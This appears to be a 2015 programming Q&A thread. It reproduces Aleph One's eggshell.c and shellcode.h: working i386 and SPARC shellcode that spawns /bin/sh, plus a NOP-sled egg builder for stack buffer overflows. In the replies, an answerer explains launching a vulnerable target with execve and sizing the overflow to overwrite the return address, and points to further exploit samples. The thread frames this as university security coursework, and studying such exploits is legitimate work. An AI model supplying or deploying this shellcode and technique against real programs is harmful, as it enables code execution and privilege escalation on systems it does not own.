
I got this code from Aleph One:

shellcode.h

#if defined(__i386__) && defined(__linux__)

#define NOP_SIZE    1
/* A single i386 NOP (0x90). NOP_SIZE is the width of one entry of nop[] in
 * bytes; eggshell.c steps through nop[] in units of NOP_SIZE when padding. */
char nop[] = "\x90";
/* Payload bytes that eggshell.c copies into the egg after the padding. Its
 * length is measured with strlen(), so the sequence must contain no 0x00
 * byte; it ends with the literal string "/bin/sh". Defined (not declared)
 * in a header, so this file can only be included by one translation unit. */
char shellcode[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

/* Return the current stack pointer (i386/Linux only; see the #if above).
 * The asm copies %esp into %eax, the i386 integer return register, but the
 * function has no `return` statement: reaching the closing brace of a
 * non-void function and using the result is undefined behaviour in C, and
 * this only "works" while the compiler happens to leave %eax untouched
 * before returning. A proper version would use an asm output operand. */
unsigned long get_sp(void) {
   __asm__("movl %esp,%eax");
}

#elif defined(__sparc__) && defined(__sun__) && defined(__svr4__)

#define NOP_SIZE    4
/* One 4-byte SPARC instruction used as padding; NOP_SIZE matches its width
 * so eggshell.c always copies whole instructions. The same four bytes also
 * appear inside shellcode[] below. */
char nop[]="\xac\x15\xa1\x6e";
/* Payload bytes for SPARC/__sun__/__svr4__ (see the #elif above). Measured
 * with strlen() by eggshell.c, so it must not contain a 0x00 byte. */
char shellcode[] =
  "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xdc\xda\x90\x0b\x80\x0e"
  "\x92\x03\xa0\x08\x94\x1a\x80\x0a\x9c\x03\xa0\x10\xec\x3b\xbf\xf0"
  "\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b\x91\xd0\x20\x08"
  "\x90\x1b\xc0\x0f\x82\x10\x20\x01\x91\xd0\x20\x08";

/* Return the current stack pointer (SPARC only; see the #elif above).
 * The asm copies %sp into %i0, which after the register-window restore is
 * where the caller reads the return value. There is no `return` statement,
 * so in C terms the result is undefined; it relies on the compiler not
 * clobbering %i0 before the function returns. */
unsigned long get_sp(void) {
  __asm__("or %sp, %sp, %i0");
}

#elif defined(__sparc__) && defined(__sun__)

#define NOP_SIZE        4
/* Same 4-byte SPARC padding instruction as in the __svr4__ branch above;
 * NOP_SIZE is its width so eggshell.c copies whole instructions. */
char nop[]="\xac\x15\xa1\x6e";
/* Payload bytes for SPARC/__sun__ without __svr4__ (see the #elif above).
 * Identical to the __svr4__ variant up to the 46th byte; only the tail
 * differs. Measured with strlen() by eggshell.c, so no 0x00 byte allowed. */
char shellcode[] =
  "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xdc\xda\x90\x0b\x80\x0e"
  "\x92\x03\xa0\x08\x94\x1a\x80\x0a\x9c\x03\xa0\x10\xec\x3b\xbf\xf0"
  "\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b\xaa\x10\x3f\xff"
  "\x91\xd5\x60\x01\x90\x1b\xc0\x0f\x82\x10\x20\x01\x91\xd5\x60\x01";

/* Return the current stack pointer (SPARC only; same implementation as the
 * __svr4__ branch above). %sp is copied into %i0, the callee-side register
 * the caller reads the return value from, but there is no `return`
 * statement, so the value is undefined as far as C is concerned. */
unsigned long get_sp(void) {
  __asm__("or %sp, %sp, %i0");
}

#endif

eggshell.c

/*
 * eggshell v1.0
 *
 * Aleph One / aleph1@underground.org
 */
#include <stdlib.h>
#include <stdio.h>
#include "shellcode.h"

#define DEFAULT_OFFSET                    0
#define DEFAULT_BUFFER_SIZE             512
#define DEFAULT_EGG_SIZE               2048

void usage(void);

/*
 * Program entry point. Builds two environment variables and then starts an
 * interactive shell that inherits them:
 *   EGG=  NOP padding (from nop[]) followed by shellcode[], both from
 *         shellcode.h, sized by -e
 *   BOF=  -b bytes filled with one repeated address: get_sp() minus -o
 * -a selects the starting index inside nop[] for the padding pattern.
 *
 * NOTE(review): `void main` is not standard C. getopt()/optarg need
 * <unistd.h> and strlen()/memcpy() need <string.h>; neither is included
 * above, so this relies on implicit declarations that C99 and later reject.
 * All error paths call exit(0), i.e. report success to the caller.
 */
void main(int argc, char *argv[]) {
  char *ptr, *bof, *egg;
  long *addr_ptr, addr;
  int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
  int i, n, m, c, align=0, eggsize=DEFAULT_EGG_SIZE;

  /* atoi() reports no errors: a non-numeric or negative option value
   * silently becomes 0 or a negative size and is never validated below.
   * getopt() signals the end of options with -1; EOF is used here, which
   * equals -1 on common C libraries. */
  while ((c = getopt(argc, argv, "a:b:e:o:")) != EOF)
    switch (c) {
      case 'a':
        align = atoi(optarg);
        break;
      case 'b':
        bsize = atoi(optarg);
        break;
      case 'e':
        eggsize = atoi(optarg);
        break;
      case 'o':
        offset = atoi(optarg);
        break;
      case '?':
        usage();
        exit(0);
    }

  /* strlen() is size_t, so eggsize is converted to unsigned for this
   * comparison; a negative eggsize becomes a huge value and passes. */
  if (strlen(shellcode) > eggsize) {
    printf("Shellcode is larger the the egg.\n");
    exit(0);
  }

  /* Both buffers are passed to putenv() below and are never freed. */
  if (!(bof = malloc(bsize))) {
    printf("Can't allocate memory.\n");
    exit(0);
  }
  if (!(egg = malloc(eggsize))) {
    printf("Can't allocate memory.\n");
    exit(0);
  }

  addr = get_sp() - offset;
  printf("[ Buffer size:\t%d\t\tEgg size:\t%d\tAligment:\t%d\t]\n",
    bsize, eggsize, align);
  /* NOTE(review): %x expects unsigned int but addr is long; %lx would match
   * (format/argument mismatch is undefined behaviour). */
  printf("[ Address:\t0x%x\tOffset:\t\t%d\t\t\t\t]\n", addr, offset);

  /* Fill bof with addr, one long per store. The step of 4 assumes
   * sizeof(long) == 4 (true on the i386 / 32-bit SPARC targets in
   * shellcode.h); on an LP64 target each store is 8 bytes and the loop
   * writes past the end of bof. A bsize that is not a multiple of 4 also
   * overruns on the last store. */
  addr_ptr = (long *) bof;
  for (i = 0; i < bsize; i+=4)
    *(addr_ptr++) = addr;

  /* Pad the egg with nop[] one NOP_SIZE unit at a time, rotating the start
   * of the pattern by `align`, leaving room for shellcode at the end. The
   * bound is computed in size_t because strlen() is unsigned. */
  ptr = egg;
  for (i = 0; i <= eggsize - strlen(shellcode) - NOP_SIZE; i += NOP_SIZE)
    for (n = 0; n < NOP_SIZE; n++) {
      m = (n + align) % NOP_SIZE;
      *(ptr++) = nop[m];
    }

  /* Append the shellcode bytes directly after the padding. */
  for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode[i];

  /* NUL-terminate so putenv() sees C strings; the last byte of each buffer
   * is replaced by the terminator. With bsize or eggsize of 0 these index
   * one byte before the allocation. */
  bof[bsize - 1] = '\0';
  egg[eggsize - 1] = '\0';

  /* The buffers themselves become the environment strings: the first four
   * bytes of each are overwritten with the "NAME=" prefix, then the
   * pointer is handed to putenv(). */
  memcpy(egg,"EGG=",4);
  putenv(egg);

  memcpy(bof,"BOF=",4);
  putenv(bof);
  system("/bin/sh");
}

/* Print the command-line synopsis to stderr. */
void usage(void) {
  static const char synopsis[] =
    "usage: eggshell [-a <alignment>] [-b <buffersize>] [-e <eggsize>] [-o <offset>]\n";
  fputs(synopsis, stderr);
}

I'm trying to use this exploit on another vulnerable program, and I understand that I need to launch the other vulnerable program from the Aleph One program. Could somebody please tell me how to do that?

  • Please don't ask for help with malware development here, as a refusal and a down/close vote often offend. – Martin James Dec 09 '15 at 10:00
  • @MartinJames, there are so many questions about malware last time. Any ideas why? – kelin Dec 09 '15 at 10:21
  • Why not ask?? I'm doing this for research, not for anything that will cause damage to someone... the vulnerable program is a program from my studies... – Elad Doocker Dec 09 '15 at 10:45
  • There are, but please understand that it's not a personal issue:) Whenever I see 'buffer overflow', 'exploit', 'vulnerability' etc. I just auto down and close vote. If it has a whiff of malware, I always respond in that manner. ' im doing this for research' - I'm sure you understand that malware developers lie. I'm not saying that you are, but you may be. – Martin James Dec 09 '15 at 10:55
  • All those "shell code" exploits only work on specific environments and with specific compilers. – Jabberwocky Dec 09 '15 at 11:06
  • Well, if I post here the vulnerable program I want to use it on, will that help?? – Elad Doocker Dec 09 '15 at 11:55



This question is not about malware development; it is the content of security classes at many universities!

The target program must accept input if you want to run this buffer overflow on it. You start the target program with the execve system call, whose arguments are the program's location and an array of arguments.

You get the address with get_sp() from shellcode.h, you get the shellcode from shellcode.h, and you fill your buffer (which will overflow) inside eggshell.c. Then you start the target program with execve(), giving the buffer as an argument, and the overflow will occur, which will open a shell for you.

A sample exploit can be found here and its target is here. It does not use get_sp; the addresses are hardcoded there.

Update: links are broken. You can find similar repositories on google with search keyword "sploit1.c target1.c site:github.com"

  • Thank you for your help!!! Can you please tell me if there is any way to find the buffer address without using gdb?? Because the program I need to buffer-overflow wasn't compiled with the gdb flag... – Elad Doocker Dec 10 '15 at 16:03
  • I got it with gdb; I don't know other ways. – Jemshit Dec 10 '15 at 16:05
  • OK, thanks. And another question... do you know what the use of align is as a parameter in Aleph One's eggshell.c code?? – Elad Doocker Dec 12 '15 at 01:08
  • I think it just fills the egg with nop[], starting from the end of nop[] to the beginning or vice versa. That nop[] with size 4 is for the SPARC system, not for Linux. On Linux the NOP instruction is 0x90. – Jemshit Dec 12 '15 at 09:24
  • Yeah, I know, but his function gets align as one of the parameters; how can I know how many NOPs I need?? – Elad Doocker Dec 12 '15 at 10:00
  • You don't need to; it fills the egg with NOPs until the shellcode fits at the end. Check the outer for loop there. NOP is just a skipping instruction which does not do anything. So when EIP points to any address where a NOP is located, it skips to the next address until it finds an executable instruction, which is the shellcode in this case. I am not sure how many bytes you should overwrite on SPARC; on Linux x86, if you have a 200-byte buffer, you just need a 208-byte buffer to overflow it: 4 bytes for the SFP and 4 bytes for the return address. Fill the first bytes of the buffer with NOPs and the last bytes until index 200 with the shellcode. – Jemshit Dec 12 '15 at 10:06